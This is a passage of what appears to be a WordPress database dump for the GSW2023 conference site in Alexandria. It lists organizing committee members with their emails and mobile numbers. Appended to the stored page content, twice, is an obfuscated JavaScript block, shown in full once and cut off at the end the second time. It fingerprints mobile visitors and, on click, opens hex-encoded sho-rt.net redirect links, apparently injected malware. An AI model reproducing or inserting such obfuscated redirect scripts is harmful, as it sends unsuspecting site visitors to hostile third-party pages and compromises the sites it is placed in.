width=\"1/4\"][vc_single_image image=\"4939\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Mohamed Abdallah Mahmoud </strong></em></span><br />\nLocal financial Director, GSW2023, Egypt<br />\nArab Academy for Science, Technology and Maritime Transport<br />\nP.O.Box 1029, Alexandria, Egypt</p>\n<table>\n<tbody>\n<tr>\n<td>Email:</td>\n<td>mohamed_abdallah20102002@yahoo.com</td>\n</tr>\n<tr>\n<td>Mobile:</td>\n<td>+201141401861</td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-06-27 13:45:48','2023-06-27 13:45:48','',4849,'https://gsw2023.com/?p=4941',0,'revision','',0),
(4942,4,'2023-06-28 09:14:04','2023-06-28 09:14:04','<p>[vc_row css=\".vc_custom_1687871707649{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1687871751542{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687871759816{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Chairman</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4614\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span><br />\nVice President for Post Graduate and Scientific Research<br />\nArab Academy for Science, Technology and Maritime Transport<br />\nP.O.Box 1029, Alexandria, Egypt</p>\n<table style=\"margin: 0px; padding: 0px;\">\n<tbody>\n<tr>\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\n<td style=\"width: 26%;\">aaelbary@aast.edu</td>\n<td style=\"width: 26%;\">aaelbary@gsw2023.com</td>\n<td style=\"width: 26%;\">gsw2023@aast.edu</td>\n</tr>\n<tr>\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\n<td style=\"width: 26%;\">Office: +203 5497598</td>\n<td style=\"width: 26%;\">Fax: +203 5497598</td>\n<td style=\"width: 26%;\">Mobile: +20 100 7382 198</td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Scientific Affairs</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871606693{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1687943626436{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/dr-nashwa-1.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Nashwa El-Bendary</strong></em></span><br />\n<span style=\"font-size: 9pt;\">nashwa.elbendary@aast.edu</span><br />\n<span style=\"font-size: 12pt;\">+201227217550</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Yahya_Photo_Enhanced3.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Yahya Z. Mohasseb </strong></em></span><br />\n<span style=\"font-size: 12pt;\">ymohasseb@aast.edu</span><br />\n<span style=\"font-size: 12pt;\">+201227217550</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/amira_ibrahim_zaki.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Amira Zaki</strong></em></span><br />\n<span style=\"font-size: 12pt;\">amzak10@aast.edu</span><br />\n<span style=\"font-size: 12pt;\">+201006619608</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/radwa_ahmed_osman.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Dr. Radwa Osman </strong></em></span><br />\n<span style=\"font-size: 12pt;\">radwa.ahmed@aast.edu</span><br />\n<span style=\"font-size: 12pt;\">+201001552854</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column css=\".vc_custom_1687871596223{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687871574136{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>IT Support</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871361897{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687871425647{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687873508355{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/avatar.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ayman Elzagh</strong></em></span><br />\n<span style=\"font-size: 12pt;\">Local Web director<br />\nGSW2023, Egypt<br />\n<span style=\"font-size: 11pt;\">ay.zagh@gmail.com</span><br />\n<span style=\"font-size: 12pt;\">+201210007979</span></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871435951{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;}\"][vc_column_text css=\".vc_custom_1687873468324{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/avatar.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ahmed ElGamal </strong></em></span><br />\n<span style=\"font-size: 12pt;\">gamal97@gmail.com </span><br />\n<span style=\"font-size: 12pt;\">+201001610401</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871462058{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;border-left-color: rgba(0,0,0,0.01) !important;border-right-color: rgba(0,0,0,0.01) !important;border-top-color: rgba(0,0,0,0.01) !important;border-bottom-color: rgba(0,0,0,0.01) !important;}\" el_class=\"gsw-no-border\"][vc_column_text css=\".vc_custom_1687871454148{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;border-left-color: rgba(255,255,255,0.01) !important;border-right-color: rgba(255,255,255,0.01) !important;border-top-color: rgba(255,255,255,0.01) !important;border-bottom-color: rgba(255,255,255,0.01) !important;}\" el_class=\"gsw-no-border\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/nagy.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Nagy K. Aly</strong></em></span><br />\n<span style=\"font-size: 12pt;\">nagy@aast.edu</span><br />\n<span style=\"font-size: 12pt;\">+201141606029</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871347747{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column css=\".vc_custom_1687861905334{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_text css=\".vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 12pt;\">Arab Academy for Science &amp; Technology &amp; Maritime Transport</span></strong><br />\n<strong><span style=\"font-size: 12pt;\">P.O.Box: 1029 Alexandria Egypt</span></strong>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687872978322{margin-bottom: 10px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687872285543{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Hotels Reservation and Public Relations</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4936\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Yasser Elrashidi</strong></em></span><br />\nDirector of Events and conferences Department<br />\nArab Academy for Science, Technology and Maritime Transport<br />\nP.O.Box 1029, Alexandria, Egypt</p>\n<table>\n<tr>\n<td>Email:</td>\n<td>yasserelrashidi@aast.edu</td>\n</tr>\n<tr>\n<td>Mobile:</td>\n<td>+201270059999</td>\n</tr>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687873543921{margin-bottom: 10px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687873078553{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Financial Affairs</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4939\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Mohamed Abdallah Mahmoud </strong></em></span><br />\nLocal financial Director, GSW2023, Egypt<br />\nArab Academy for Science, Technology and Maritime Transport<br />\nP.O.Box 1029, Alexandria, Egypt</p>\n<table>\n<tbody>\n<tr>\n<td>Email:</td>\n<td>mohamed_abdallah20102002@yahoo.com</td>\n</tr>\n<tr>\n<td>Mobile:</td>\n<td>+201141401861</td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s 